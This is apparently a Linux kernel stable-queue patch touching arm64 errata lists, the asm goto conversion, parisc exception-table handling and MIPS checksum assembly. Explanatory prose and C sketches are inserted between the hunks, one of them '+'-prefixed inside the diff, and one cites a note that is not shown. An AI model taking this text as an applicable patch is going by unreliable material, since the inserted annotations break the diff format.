+ #define MIDR_APPLE_M1_FIRESTORM_MAX MIDR_CPU_MODEL(ARM_CPU_IMP_APPLE, APPLE_CPU_PART_M1_FIRESTORM_MAX)
+ #define MIDR_AMPERE1 MIDR_CPU_MODEL(ARM_CPU_IMP_AMPERE, AMPERE_CPU_PART_AMPERE1)
++#define MIDR_MICROSOFT_AZURE_COBALT_100 MIDR_CPU_MODEL(ARM_CPU_IMP_MICROSOFT, MICROSOFT_CPU_PART_AZURE_COBALT_100)
+ 
+ /* Fujitsu Erratum 010001 affects A64FX 1.0 and 1.1, (v0r0 and v1r0) */
+ #define MIDR_FUJITSU_ERRATUM_010001		MIDR_FUJITSU_A64FX
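
MIDR_CPU_MODEL() packs an implementer/part pair into the architectural
MIDR_EL1 layout; a userspace-style sketch of how the new Cobalt 100
value decodes (the field positions are architectural, and the sample
value is just this patch's implementer/part pair):

  #include <stdio.h>
  #include <stdint.h>

  /* MIDR_EL1: implementer [31:24], variant [23:20], architecture
   * [19:16], part number [15:4], revision [3:0]. */
  static void decode_midr(uint32_t midr)
  {
          unsigned int imp  = (midr >> 24) & 0xff;
          unsigned int var  = (midr >> 20) & 0xf;
          unsigned int part = (midr >> 4) & 0xfff;
          unsigned int rev  = midr & 0xf;

          printf("implementer 0x%02X, part 0x%03X, r%up%u\n",
                 imp, part, var, rev);
  }

  int main(void)
  {
          /* ARM_CPU_IMP_MICROSOFT (0x6D), part 0xD49, r0p0 -- matching
           * the "based on r0p0 of ARM Neoverse N2" note above. */
          decode_midr((0x6DU << 24) | (0xD49U << 4));
          return 0;
  }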
+diff --git a/arch/arm64/include/asm/jump_label.h b/arch/arm64/include/asm/jump_label.h
+index cea441b6aa5dc..b5bd3c38a01b2 100644
+--- a/arch/arm64/include/asm/jump_label.h
++++ b/arch/arm64/include/asm/jump_label.h
+@@ -18,7 +18,7 @@
+ static __always_inline bool arch_static_branch(struct static_key *key,
+ 					       bool branch)
+ {
+-	asm_volatile_goto(
++	asm goto(
+ 		"1:	nop					\n\t"
+ 		 "	.pushsection	__jump_table, \"aw\"	\n\t"
+ 		 "	.align		3			\n\t"
+@@ -35,7 +35,7 @@ static __always_inline bool arch_static_branch(struct static_key *key,
+ static __always_inline bool arch_static_branch_jump(struct static_key *key,
+ 						    bool branch)
+ {
+-	asm_volatile_goto(
++	asm goto(
+ 		"1:	b		%l[l_yes]		\n\t"
+ 		 "	.pushsection	__jump_table, \"aw\"	\n\t"
+ 		 "	.align		3			\n\t"
+diff --git a/arch/arm64/kernel/cpu_errata.c b/arch/arm64/kernel/cpu_errata.c
+index 61f22e9c92b4c..74584597bfb82 100644
+--- a/arch/arm64/kernel/cpu_errata.c
++++ b/arch/arm64/kernel/cpu_errata.c
+@@ -390,6 +390,7 @@ static const struct midr_range erratum_1463225[] = {
+ static const struct midr_range trbe_overwrite_fill_mode_cpus[] = {
+ #ifdef CONFIG_ARM64_ERRATUM_2139208
+ 	MIDR_ALL_VERSIONS(MIDR_NEOVERSE_N2),
++	MIDR_ALL_VERSIONS(MIDR_MICROSOFT_AZURE_COBALT_100),
+ #endif
+ #ifdef CONFIG_ARM64_ERRATUM_2119858
+ 	MIDR_ALL_VERSIONS(MIDR_CORTEX_A710),
+@@ -403,6 +404,7 @@ static const struct midr_range trbe_overwrite_fill_mode_cpus[] = {
+ static const struct midr_range tsb_flush_fail_cpus[] = {
+ #ifdef CONFIG_ARM64_ERRATUM_2067961
+ 	MIDR_ALL_VERSIONS(MIDR_NEOVERSE_N2),
++	MIDR_ALL_VERSIONS(MIDR_MICROSOFT_AZURE_COBALT_100),
+ #endif
+ #ifdef CONFIG_ARM64_ERRATUM_2054223
+ 	MIDR_ALL_VERSIONS(MIDR_CORTEX_A710),
+@@ -415,6 +417,7 @@ static const struct midr_range tsb_flush_fail_cpus[] = {
+ static struct midr_range trbe_write_out_of_range_cpus[] = {
+ #ifdef CONFIG_ARM64_ERRATUM_2253138
+ 	MIDR_ALL_VERSIONS(MIDR_NEOVERSE_N2),
++	MIDR_ALL_VERSIONS(MIDR_MICROSOFT_AZURE_COBALT_100),
+ #endif
+ #ifdef CONFIG_ARM64_ERRATUM_2224489
+ 	MIDR_ALL_VERSIONS(MIDR_CORTEX_A710),
+diff --git a/arch/arm64/kernel/vdso32/Makefile b/arch/arm64/kernel/vdso32/Makefile
+index 36c8f66cad251..d513533cc922f 100644
+--- a/arch/arm64/kernel/vdso32/Makefile
++++ b/arch/arm64/kernel/vdso32/Makefile
+@@ -68,11 +68,9 @@ VDSO_CFLAGS += -Wall -Wundef -Wstrict-prototypes -Wno-trigraphs \
+                -fno-strict-aliasing -fno-common \
+                -Werror-implicit-function-declaration \
+                -Wno-format-security \
+-               -Wdeclaration-after-statement \
+                -std=gnu11
+ VDSO_CFLAGS  += -O2
+ # Some useful compiler-dependent flags from top-level Makefile
+-VDSO_CFLAGS += $(call cc32-option,-Wdeclaration-after-statement,)
+ VDSO_CFLAGS += $(call cc32-option,-Wno-pointer-sign)
+ VDSO_CFLAGS += -fno-strict-overflow
+ VDSO_CFLAGS += $(call cc32-option,-Werror=strict-prototypes)
+diff --git a/arch/csky/include/asm/jump_label.h b/arch/csky/include/asm/jump_label.h
+index 98a3f4b168bd2..ef2e37a10a0fe 100644
+--- a/arch/csky/include/asm/jump_label.h
++++ b/arch/csky/include/asm/jump_label.h
+@@ -12,7 +12,7 @@
+ static __always_inline bool arch_static_branch(struct static_key *key,
+ 					       bool branch)
+ {
+-	asm_volatile_goto(
++	asm goto(
+ 		"1:	nop32					\n"
+ 		"	.pushsection	__jump_table, \"aw\"	\n"
+ 		"	.align		2			\n"
+@@ -29,7 +29,7 @@ static __always_inline bool arch_static_branch(struct static_key *key,
+ static __always_inline bool arch_static_branch_jump(struct static_key *key,
+ 						    bool branch)
+ {
+-	asm_volatile_goto(
++	asm goto(
+ 		"1:	bsr32		%l[label]		\n"
+ 		"	.pushsection	__jump_table, \"aw\"	\n"
+ 		"	.align		2			\n"
+diff --git a/arch/mips/include/asm/checksum.h b/arch/mips/include/asm/checksum.h
+index 4044eaf989ac7..0921ddda11a4b 100644
+--- a/arch/mips/include/asm/checksum.h
++++ b/arch/mips/include/asm/checksum.h
+@@ -241,7 +241,8 @@ static __inline__ __sum16 csum_ipv6_magic(const struct in6_addr *saddr,
+ 	"	.set	pop"
+ 	: "=&r" (sum), "=&r" (tmp)
+ 	: "r" (saddr), "r" (daddr),
+-	  "0" (htonl(len)), "r" (htonl(proto)), "r" (sum));
++	  "0" (htonl(len)), "r" (htonl(proto)), "r" (sum)
++	: "memory");
+ 
+ 	return csum_fold(sum);
+ }
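
The clobber is needed because the asm dereferences saddr and daddr
behind pointer operands: the compiler only sees the pointers, not the
loads, so without "memory" it may reorder or drop earlier stores to
those buffers. A self-contained sketch of the same idiom (x86-64 rather
than MIPS, purely for illustration):

  #include <stdio.h>

  /* Only the pointer is an operand; the load happens inside the asm.
   * The "memory" clobber keeps prior stores to *p ordered before the
   * asm instead of being reordered or optimised away. */
  static unsigned long load_via_asm(const unsigned long *p)
  {
          unsigned long v;

          asm volatile("movq (%1), %0"
                       : "=r" (v)
                       : "r" (p)
                       : "memory");
          return v;
  }

  int main(void)
  {
          unsigned long x = 42;

          printf("%lu\n", load_via_asm(&x));
          return 0;
  }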
+diff --git a/arch/mips/include/asm/jump_label.h b/arch/mips/include/asm/jump_label.h
+index c5c6864e64bc4..405c85173f2c1 100644
+--- a/arch/mips/include/asm/jump_label.h
++++ b/arch/mips/include/asm/jump_label.h
+@@ -36,7 +36,7 @@
+ 
+ static __always_inline bool arch_static_branch(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:\t" B_INSN " 2f\n\t"
++	asm goto("1:\t" B_INSN " 2f\n\t"
+ 		"2:\t.insn\n\t"
+ 		".pushsection __jump_table,  \"aw\"\n\t"
+ 		WORD_INSN " 1b, %l[l_yes], %0\n\t"
+@@ -50,7 +50,7 @@ static __always_inline bool arch_static_branch(struct static_key *key, bool bran
+ 
+ static __always_inline bool arch_static_branch_jump(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:\t" J_INSN " %l[l_yes]\n\t"
++	asm goto("1:\t" J_INSN " %l[l_yes]\n\t"
+ 		".pushsection __jump_table,  \"aw\"\n\t"
+ 		WORD_INSN " 1b, %l[l_yes], %0\n\t"
+ 		".popsection\n\t"
+diff --git a/arch/parisc/Kconfig b/arch/parisc/Kconfig
+index 345d5e021484c..abf39ecda6fb1 100644
+--- a/arch/parisc/Kconfig
++++ b/arch/parisc/Kconfig
+@@ -24,7 +24,6 @@ config PARISC
+ 	select RTC_DRV_GENERIC
+ 	select INIT_ALL_POSSIBLE
+ 	select BUG
+-	select BUILDTIME_TABLE_SORT
+ 	select HAVE_PCI
+ 	select HAVE_PERF_EVENTS
+ 	select HAVE_KERNEL_BZIP2
+diff --git a/arch/parisc/include/asm/assembly.h b/arch/parisc/include/asm/assembly.h
+index 74d17d7e759da..5937d5edaba1e 100644
+--- a/arch/parisc/include/asm/assembly.h
++++ b/arch/parisc/include/asm/assembly.h
+@@ -576,6 +576,7 @@
+ 	.section __ex_table,"aw"			!	\
+ 	.align 4					!	\
+ 	.word (fault_addr - .), (except_addr - .)	!	\
++	or %r0,%r0,%r0					!	\
+ 	.previous
+ 
+ 
+diff --git a/arch/parisc/include/asm/extable.h b/arch/parisc/include/asm/extable.h
+new file mode 100644
+index 0000000000000..4ea23e3d79dc9
+--- /dev/null
++++ b/arch/parisc/include/asm/extable.h
+@@ -0,0 +1,64 @@
++/* SPDX-License-Identifier: GPL-2.0 */
++#ifndef __PARISC_EXTABLE_H
++#define __PARISC_EXTABLE_H
++
++#include <asm/ptrace.h>
++#include <linux/compiler.h>
++
++/*
++ * The exception table consists of three addresses:
++ *
++ * - A relative address to the instruction that is allowed to fault.
++ * - A relative address at which the program should continue (fixup routine)
++ * - An asm statement which specifies which CPU register will
++ *   receive -EFAULT when an exception happens if the lowest bit in
++ *   the fixup address is set.
++ *
++ * Note: The register specified in the err_opcode instruction will be
++ * modified at runtime if a fault happens. Register %r0 will be ignored.
++ *
++ * Since relative addresses are used, 32bit values are sufficient even on
++ * 64bit kernel.
++ */
++
++struct pt_regs;
++int fixup_exception(struct pt_regs *regs);
++
++#define ARCH_HAS_RELATIVE_EXTABLE
++struct exception_table_entry {
++	int insn;	/* relative address of insn that is allowed to fault. */
++	int fixup;	/* relative address of fixup routine */
++	int err_opcode; /* sample opcode with register which holds error code */
++};
++
++#define ASM_EXCEPTIONTABLE_ENTRY( fault_addr, except_addr, opcode )\
++	".section __ex_table,\"aw\"\n"			   \
++	".align 4\n"					   \
++	".word (" #fault_addr " - .), (" #except_addr " - .)\n" \
++	opcode "\n"					   \
++	".previous\n"
++
++/*
++ * ASM_EXCEPTIONTABLE_ENTRY_EFAULT() creates a special exception table entry
++ * (with lowest bit set) for which the fault handler in fixup_exception() will
++ * load -EFAULT on fault into the register specified by the err_opcode instruction,
++ * and zeroes the target register in case of a read fault in get_user().
++ */
++#define ASM_EXCEPTIONTABLE_VAR(__err_var)		\
++	int __err_var = 0
++#define ASM_EXCEPTIONTABLE_ENTRY_EFAULT( fault_addr, except_addr, register )\
++	ASM_EXCEPTIONTABLE_ENTRY( fault_addr, except_addr + 1, "or %%r0,%%r0," register)
++
++static inline void swap_ex_entry_fixup(struct exception_table_entry *a,
++				       struct exception_table_entry *b,
++				       struct exception_table_entry tmp,
++				       int delta)
++{
++	a->fixup = b->fixup + delta;
++	b->fixup = tmp.fixup - delta;
++	a->err_opcode = b->err_opcode;
++	b->err_opcode = tmp.err_opcode;
++}
++#define swap_ex_entry_fixup swap_ex_entry_fixup
++
++#endif
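
With ARCH_HAS_RELATIVE_EXTABLE each address is stored as an offset from
its own field, so resolving an entry just adds the field's address back
in; a simplified sketch of that arithmetic (mirroring the generic
extable helpers, with main() standing in for a "faulting" address):

  #include <stdio.h>
  #include <stdint.h>

  struct exentry {
          int32_t insn;   /* offset from &insn to the faulting insn */
          int32_t fixup;  /* offset from &fixup to the fixup code   */
  };

  /* field address + stored offset = absolute address */
  static uintptr_t ex_insn_addr(const struct exentry *e)
  {
          return (uintptr_t)&e->insn + e->insn;
  }

  static uintptr_t ex_fixup_addr(const struct exentry *e)
  {
          return (uintptr_t)&e->fixup + e->fixup;
  }

  int main(void)
  {
          static struct exentry e;

          /* assumes code and data sit within +/-2 GiB, as in a kernel */
          e.insn  = (int32_t)((uintptr_t)main - (uintptr_t)&e.insn);
          e.fixup = (int32_t)((uintptr_t)main - (uintptr_t)&e.fixup);

          printf("resolves back: %d %d\n",
                 ex_insn_addr(&e) == (uintptr_t)main,
                 ex_fixup_addr(&e) == (uintptr_t)main);
          return 0;
  }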
+diff --git a/arch/parisc/include/asm/jump_label.h b/arch/parisc/include/asm/jump_label.h
+index 94428798b6aa6..317ebc5edc9fe 100644
+--- a/arch/parisc/include/asm/jump_label.h
++++ b/arch/parisc/include/asm/jump_label.h
+@@ -12,7 +12,7 @@
+ 
+ static __always_inline bool arch_static_branch(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:\n\t"
++	asm goto("1:\n\t"
+ 		 "nop\n\t"
+ 		 ".pushsection __jump_table,  \"aw\"\n\t"
+ 		 ".align %1\n\t"
+@@ -29,7 +29,7 @@ static __always_inline bool arch_static_branch(struct static_key *key, bool bran
+ 
+ static __always_inline bool arch_static_branch_jump(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:\n\t"
++	asm goto("1:\n\t"
+ 		 "b,n %l[l_yes]\n\t"
+ 		 ".pushsection __jump_table,  \"aw\"\n\t"
+ 		 ".align %1\n\t"
+diff --git a/arch/parisc/include/asm/special_insns.h b/arch/parisc/include/asm/special_insns.h
+index c822bd0c0e3c6..51f40eaf77806 100644
+--- a/arch/parisc/include/asm/special_insns.h
++++ b/arch/parisc/include/asm/special_insns.h
+@@ -8,7 +8,8 @@
+ 		"copy %%r0,%0\n"			\
+ 		"8:\tlpa %%r0(%1),%0\n"			\
+ 		"9:\n"					\
+-		ASM_EXCEPTIONTABLE_ENTRY(8b, 9b)	\
++		ASM_EXCEPTIONTABLE_ENTRY(8b, 9b,	\
++				"or %%r0,%%r0,%%r0")	\
+ 		: "=&r" (pa)				\
+ 		: "r" (va)				\
+ 		: "memory"				\
+@@ -22,7 +23,8 @@
+ 		"copy %%r0,%0\n"			\
+ 		"8:\tlpa %%r0(%%sr3,%1),%0\n"		\
+ 		"9:\n"					\
+-		ASM_EXCEPTIONTABLE_ENTRY(8b, 9b)	\
++		ASM_EXCEPTIONTABLE_ENTRY(8b, 9b,	\
++				"or %%r0,%%r0,%%r0")	\
+ 		: "=&r" (pa)				\
+ 		: "r" (va)				\
+ 		: "memory"				\
+diff --git a/arch/parisc/include/asm/uaccess.h b/arch/parisc/include/asm/uaccess.h
+index 4165079898d9e..88d0ae5769dde 100644
+--- a/arch/parisc/include/asm/uaccess.h
++++ b/arch/parisc/include/asm/uaccess.h
+@@ -7,6 +7,7 @@
+  */
+ #include <asm/page.h>
+ #include <asm/cache.h>
++#include <asm/extable.h>
+ 
+ #include <linux/bug.h>
+ #include <linux/string.h>
+@@ -26,37 +27,6 @@
+ #define STD_USER(sr, x, ptr)	__put_user_asm(sr, "std", x, ptr)
+ #endif
+ 
+-/*
+- * The exception table contains two values: the first is the relative offset to
+- * the address of the instruction that is allowed to fault, and the second is
+- * the relative offset to the address of the fixup routine. Since relative
+- * addresses are used, 32bit values are sufficient even on 64bit kernel.
+- */
+-
+-#define ARCH_HAS_RELATIVE_EXTABLE
+-struct exception_table_entry {
+-	int insn;	/* relative address of insn that is allowed to fault. */
+-	int fixup;	/* relative address of fixup routine */
+-};
+-
+-#define ASM_EXCEPTIONTABLE_ENTRY( fault_addr, except_addr )\
+-	".section __ex_table,\"aw\"\n"			   \
+-	".align 4\n"					   \
+-	".word (" #fault_addr " - .), (" #except_addr " - .)\n\t" \
+-	".previous\n"
+-
+-/*
+- * ASM_EXCEPTIONTABLE_ENTRY_EFAULT() creates a special exception table entry
+- * (with lowest bit set) for which the fault handler in fixup_exception() will
+- * load -EFAULT into %r29 for a read or write fault, and zeroes the target
+- * register in case of a read fault in get_user().
+- */
+-#define ASM_EXCEPTIONTABLE_REG	29
+-#define ASM_EXCEPTIONTABLE_VAR(__variable)		\
+-	register long __variable __asm__ ("r29") = 0
+-#define ASM_EXCEPTIONTABLE_ENTRY_EFAULT( fault_addr, except_addr )\
+-	ASM_EXCEPTIONTABLE_ENTRY( fault_addr, except_addr + 1)
+-
+ #define __get_user_internal(sr, val, ptr)		\
+ ({							\
+ 	ASM_EXCEPTIONTABLE_VAR(__gu_err);		\
+@@ -83,7 +53,7 @@ struct exception_table_entry {
+ 							\
+ 	__asm__("1: " ldx " 0(%%sr%2,%3),%0\n"		\
+ 		"9:\n"					\
+-		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 9b)	\
++		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 9b, "%1")	\
+ 		: "=r"(__gu_val), "+r"(__gu_err)        \
+ 		: "i"(sr), "r"(ptr));			\
+ 							\
+@@ -115,8 +85,8 @@ struct exception_table_entry {
+ 		"1: ldw 0(%%sr%2,%3),%0\n"		\
+ 		"2: ldw 4(%%sr%2,%3),%R0\n"		\
+ 		"9:\n"					\
+-		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 9b)	\
+-		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 9b)	\
++		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 9b, "%1")	\
++		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 9b, "%1")	\
+ 		: "=&r"(__gu_tmp.l), "+r"(__gu_err)	\
+ 		: "i"(sr), "r"(ptr));			\
+ 							\
+@@ -174,7 +144,7 @@ struct exception_table_entry {
+ 	__asm__ __volatile__ (					\
+ 		"1: " stx " %1,0(%%sr%2,%3)\n"			\
+ 		"9:\n"						\
+-		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 9b)		\
++		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 9b, "%0")	\
+ 		: "+r"(__pu_err)				\
+ 		: "r"(x), "i"(sr), "r"(ptr))
+ 
+@@ -186,15 +156,14 @@ struct exception_table_entry {
+ 		"1: stw %1,0(%%sr%2,%3)\n"			\
+ 		"2: stw %R1,4(%%sr%2,%3)\n"			\
+ 		"9:\n"						\
+-		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 9b)		\
+-		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 9b)		\
++		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 9b, "%0")	\
++		ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 9b, "%0")	\
+ 		: "+r"(__pu_err)				\
+ 		: "r"(__val), "i"(sr), "r"(ptr));		\
+ } while (0)
+ 
+ #endif /* !defined(CONFIG_64BIT) */
+ 
+-
+ /*
+  * Complex access routines -- external declarations
+  */
+@@ -216,7 +185,4 @@ unsigned long __must_check raw_copy_from_user(void *dst, const void __user *src,
+ #define INLINE_COPY_TO_USER
+ #define INLINE_COPY_FROM_USER
+ 
+-struct pt_regs;
+-int fixup_exception(struct pt_regs *regs);
+-
+ #endif /* __PARISC_UACCESS_H */
+diff --git a/arch/parisc/kernel/drivers.c b/arch/parisc/kernel/drivers.c
+index 8f12b9f318ae6..a582928739dd5 100644
+--- a/arch/parisc/kernel/drivers.c
++++ b/arch/parisc/kernel/drivers.c
+@@ -1003,6 +1003,9 @@ static __init int qemu_print_iodc_data(struct device *lin_dev, void *data)
+ 
+ 	pr_info("\n");
+ 
++	/* Prevent hung task messages when printing on serial console */
++	cond_resched();
++
+ 	pr_info("#define HPA_%08lx_DESCRIPTION \"%s\"\n",
+ 		hpa, parisc_hardware_description(&dev->id));
+ 
+diff --git a/arch/parisc/kernel/unaligned.c b/arch/parisc/kernel/unaligned.c
+index e8a4d77cff53a..8a8e7d7224a26 100644
+--- a/arch/parisc/kernel/unaligned.c
++++ b/arch/parisc/kernel/unaligned.c
+@@ -118,8 +118,8 @@ static int emulate_ldh(struct pt_regs *regs, int toreg)
+ "2:	ldbs	1(%%sr1,%3), %0\n"
+ "	depw	%2, 23, 24, %0\n"
+ "3:	\n"
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b)
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b, "%1")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b, "%1")
+ 	: "+r" (val), "+r" (ret), "=&r" (temp1)
+ 	: "r" (saddr), "r" (regs->isr) );
+ 
+@@ -150,8 +150,8 @@ static int emulate_ldw(struct pt_regs *regs, int toreg, int flop)
+ "	mtctl	%2,11\n"
+ "	vshd	%0,%3,%0\n"
+ "3:	\n"
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b)
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b, "%1")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b, "%1")
+ 	: "+r" (val), "+r" (ret), "=&r" (temp1), "=&r" (temp2)
+ 	: "r" (saddr), "r" (regs->isr) );
+ 
+@@ -187,8 +187,8 @@ static int emulate_ldd(struct pt_regs *regs, int toreg, int flop)
+ "	mtsar	%%r19\n"
+ "	shrpd	%0,%%r20,%%sar,%0\n"
+ "3:	\n"
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b)
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b, "%1")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b, "%1")
+ 	: "=r" (val), "+r" (ret)
+ 	: "0" (val), "r" (saddr), "r" (regs->isr)
+ 	: "r19", "r20" );
+@@ -207,9 +207,9 @@ static int emulate_ldd(struct pt_regs *regs, int toreg, int flop)
+ "	vshd	%0,%R0,%0\n"
+ "	vshd	%R0,%4,%R0\n"
+ "4:	\n"
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 4b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 4b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(3b, 4b)
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 4b, "%1")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 4b, "%1")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(3b, 4b, "%1")
+ 	: "+r" (val), "+r" (ret), "+r" (saddr), "=&r" (shift), "=&r" (temp1)
+ 	: "r" (regs->isr) );
+     }
+@@ -242,8 +242,8 @@ static int emulate_sth(struct pt_regs *regs, int frreg)
+ "1:	stb %1, 0(%%sr1, %3)\n"
+ "2:	stb %2, 1(%%sr1, %3)\n"
+ "3:	\n"
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b)
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b, "%0")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b, "%0")
+ 	: "+r" (ret), "=&r" (temp1)
+ 	: "r" (val), "r" (regs->ior), "r" (regs->isr) );
+ 
+@@ -283,8 +283,8 @@ static int emulate_stw(struct pt_regs *regs, int frreg, int flop)
+ "	stw	%%r20,0(%%sr1,%2)\n"
+ "	stw	%%r21,4(%%sr1,%2)\n"
+ "3:	\n"
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b)
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 3b, "%0")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 3b, "%0")
+ 	: "+r" (ret)
+ 	: "r" (val), "r" (regs->ior), "r" (regs->isr)
+ 	: "r19", "r20", "r21", "r22", "r1" );
+@@ -327,10 +327,10 @@ static int emulate_std(struct pt_regs *regs, int frreg, int flop)
+ "3:	std	%%r20,0(%%sr1,%2)\n"
+ "4:	std	%%r21,8(%%sr1,%2)\n"
+ "5:	\n"
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 5b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 5b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(3b, 5b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(4b, 5b)
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 5b, "%0")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 5b, "%0")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(3b, 5b, "%0")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(4b, 5b, "%0")
+ 	: "+r" (ret)
+ 	: "r" (val), "r" (regs->ior), "r" (regs->isr)
+ 	: "r19", "r20", "r21", "r22", "r1" );
+@@ -356,11 +356,11 @@ static int emulate_std(struct pt_regs *regs, int frreg, int flop)
+ "4:	stw	%%r1,4(%%sr1,%3)\n"
+ "5:	stw	%2,8(%%sr1,%3)\n"
+ "6:	\n"
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 6b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 6b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(3b, 6b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(4b, 6b)
+-	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(5b, 6b)
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(1b, 6b, "%0")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(2b, 6b, "%0")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(3b, 6b, "%0")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(4b, 6b, "%0")
++	ASM_EXCEPTIONTABLE_ENTRY_EFAULT(5b, 6b, "%0")
+ 	: "+r" (ret)
+ 	: "r" (valh), "r" (vall), "r" (regs->ior), "r" (regs->isr)
+ 	: "r19", "r20", "r21", "r1" );
+diff --git a/arch/parisc/mm/fault.c b/arch/parisc/mm/fault.c
+index b00aa98b582c2..fbd9ada5e527e 100644
+--- a/arch/parisc/mm/fault.c
++++ b/arch/parisc/mm/fault.c
+@@ -150,11 +150,16 @@ int fixup_exception(struct pt_regs *regs)
+ 		 * Fix up get_user() and put_user().
+ 		 * ASM_EXCEPTIONTABLE_ENTRY_EFAULT() sets the least-significant
+ 		 * bit in the relative address of the fixup routine to indicate
+-		 * that gr[ASM_EXCEPTIONTABLE_REG] should be loaded with
+-		 * -EFAULT to report a userspace access error.
++		 * that the register encoded in the "or %r0,%r0,register"
++		 * opcode should be loaded with -EFAULT to report a userspace
++		 * access error.
+ 		 */
+ 		if (fix->fixup & 1) {
+-			regs->gr[ASM_EXCEPTIONTABLE_REG] = -EFAULT;
++			int fault_error_reg = fix->err_opcode & 0x1f;
++			if (!WARN_ON(!fault_error_reg))
++				regs->gr[fault_error_reg] = -EFAULT;
++			pr_debug("Unalignment fixup of register %d at %pS\n",
++				fault_error_reg, (void*)regs->iaoq[0]);
+ 
+ 			/* zero target register for get_user() */
+ 			if (parisc_acctyp(0, regs->iir) == VM_READ) {
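+
+A minimal user-space sketch of the decode step used above: the fixup
+path recovers the error register from the low five bits of the recorded
+"or %r0,%r0,reg" opcode, which is what "fix->err_opcode & 0x1f"
+computes. The opcode constant below is a hypothetical placeholder, not
+a real parisc instruction encoding:
+
+    #include <stdio.h>
+
+    /* parisc stores the OR target register in the low 5 bits */
+    static unsigned int err_opcode_to_reg(unsigned int err_opcode)
+    {
+            return err_opcode & 0x1f;   /* 0 means no register recorded */
+    }
+
+    int main(void)
+    {
+            unsigned int opcode = 0x08000000u | 29; /* hypothetical; targets %r29 */
+            printf("fault error register: r%u\n", err_opcode_to_reg(opcode));
+            return 0;
+    }
+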
+diff --git a/arch/powerpc/include/asm/bug.h b/arch/powerpc/include/asm/bug.h
+index 61a4736355c24..20d5052e22925 100644
+--- a/arch/powerpc/include/asm/bug.h
++++ b/arch/powerpc/include/asm/bug.h
+@@ -74,7 +74,7 @@
+ 		  ##__VA_ARGS__)
+ 
+ #define WARN_ENTRY(insn, flags, label, ...)		\
+-	asm_volatile_goto(				\
++	asm goto(					\
+ 		"1:	" insn "\n"			\
+ 		EX_TABLE(1b, %l[label])			\
+ 		_EMIT_BUG_ENTRY				\
+diff --git a/arch/powerpc/include/asm/jump_label.h b/arch/powerpc/include/asm/jump_label.h
+index 93ce3ec253877..2f2a86ed2280a 100644
+--- a/arch/powerpc/include/asm/jump_label.h
++++ b/arch/powerpc/include/asm/jump_label.h
+@@ -17,7 +17,7 @@
+ 
+ static __always_inline bool arch_static_branch(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:\n\t"
++	asm goto("1:\n\t"
+ 		 "nop # arch_static_branch\n\t"
+ 		 ".pushsection __jump_table,  \"aw\"\n\t"
+ 		 ".long 1b - ., %l[l_yes] - .\n\t"
+@@ -32,7 +32,7 @@ static __always_inline bool arch_static_branch(struct static_key *key, bool bran
+ 
+ static __always_inline bool arch_static_branch_jump(struct static_key *key, bool branch)
+ {
+-	asm_volatile_goto("1:\n\t"
++	asm goto("1:\n\t"
